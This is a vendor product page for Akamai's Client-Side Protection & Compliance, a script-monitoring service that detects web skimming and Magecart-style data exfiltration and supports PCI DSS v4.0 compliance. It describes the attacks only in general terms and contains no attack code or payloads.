Client-Side Protection & Compliance injects JavaScript in the beginning of your page code and then monitors what happens — what the callouts are doing and what is risky between the web server and the client.
Defend your site from client-side threats. Ease compliance with PCI DSS v4.0.
Client-Side Protection & Compliance helps protect against end-user data exfiltration and shield websites from JavaScript threats. It analyzes script behavior in real time, provides actionable insights in a single dashboard view, and delivers alerts to mitigate harmful script activity. Designed for PCI DSS v4.0, the solution helps businesses meet new script security requirements and safeguards against client-side attacks.
Inject simple scripts into each monitored page without meaningfully impacting performance.
Monitor and assess script activity from the browser while machine learning techniques analyze the risk of unauthorized action.
Get real-time alerts, with detailed information about mitigation, if an active threat or attack is found.
Immediately restrict malicious scripts from accessing and exfiltrating sensitive data on protected pages with one click.
Client-Side Protection & Compliance does not collect PII data, input/form data, innerHTML (strings/texts), European Union General Data Protection Regulation–related data, or payment data (PCI DSS).
Client-Side Protection & Compliance as a solution is PCI compliant. It also helps businesses directly address requirements 6.4.3 and 11.6.1 in the latest PCI DSS v4.0, released in March 2022. Compliance with these requirements will be mandatory as of March of 2025.
Client-Side Protection & Compliance injects JavaScript in the beginning of your page code and then monitors what happens — what the callouts are doing and what is risky between the web server and the client.
Client-Side Protection & Compliance works for the most simple to the most complex sites.
Akamai architects its products with the understanding that our customers cannot have any latency — their business depends on it. Client-Side Protection & Compliance, like all Akamai’s products, is highly efficient, and any impact to your app/site performance should not impact the user experience.
Client-Side Protection & Compliance does not require change notifications or manual updates.
The edge is responsible for injecting the Client-Side Protection & Compliance code as the first resource. This is done synchronously so the Client-Side Protection & Compliance code is always the first to run; there is nothing the web page can do to avoid it. This includes third-party JavaScript that might have been corrupted. However, if the end user’s browser has malware on it (e.g., a corrupted extension), the browser can do things to the page before it even loads, including killing all scripts on the page. In this case, Client-Side Protection & Compliance cannot protect that user from an attack, as it will not be the first script that runs. This is always true with malware and client-side browsers.
JavaScript obfuscation is a series of code transformations that turn plain, easy-to-read JavaScript code into a modified version that is extremely hard to understand and reverse engineer. This means that all function and variable names are converted to meaningless names. A limited number of objects are not obfuscated, such as strings and calls to a native browser functions. JavaScript as a language doesn’t have built-in access to things like making network requests or interacting with the page; those are provided as native functions the browser makes available in the global context. Since the native function names are part of the browser, they cannot be obfuscated.
Compliance and auditing tasks can be a massive burden for security teams. Client-Side Protection & Compliance addresses the new client-side security requirements outlined in PCI DSS v4.0, which is scheduled to take effect in March 2025. With one simple tool, you can inventory, justify, and monitor all scripts observed on protected payment pages — with actionable alerts that notify security teams on unauthorized solution tampering and suspicious script behavior in real time.
Malicious or compromised JavaScript resources within the browser allow web skimming, formjacking, and Magecart attacks to steal payment card data, user credential details, or personally identifiable information. The attacker injects malicious code or malware into a website’s sensitive payment pages to extract and harvest personal information. The data exfiltration that results from these types of attacks not only damages customer trust and brand loyalty, but also subjects organizations to substantial fines. Client-Side Protection & Compliance’s behavioral detection technology constantly analyzes the behavior of script execution, in real-user sessions, to identify suspicious or outright malicious behavior, and notifies security teams with actionable insights for immediate mitigation.
Keeping web applications secure against data breaches requires comprehensive defense — and visibility. While many organizations defend against data exfiltration by focusing on protecting connections among their servers and end users through a web application firewall (WAF), there’s a blind spot when it comes to client-side activities. Client-Side Protection & Compliance goes beyond what WAFs can see or defend against on the client side. It helps organizations secure sensitive information by providing extensive visibility into script vulnerabilities and behaviors. Client-Side Protection & Compliance’s advanced dashboard allows security teams to analyze suspicious activity at a granular level, and rapidly take action on threats to the security of payment card data and personally identifiable information.
Solving problems is what we live for. Reach out — even if you’re not sure what your next step is. You’ll hear back from an expert today.
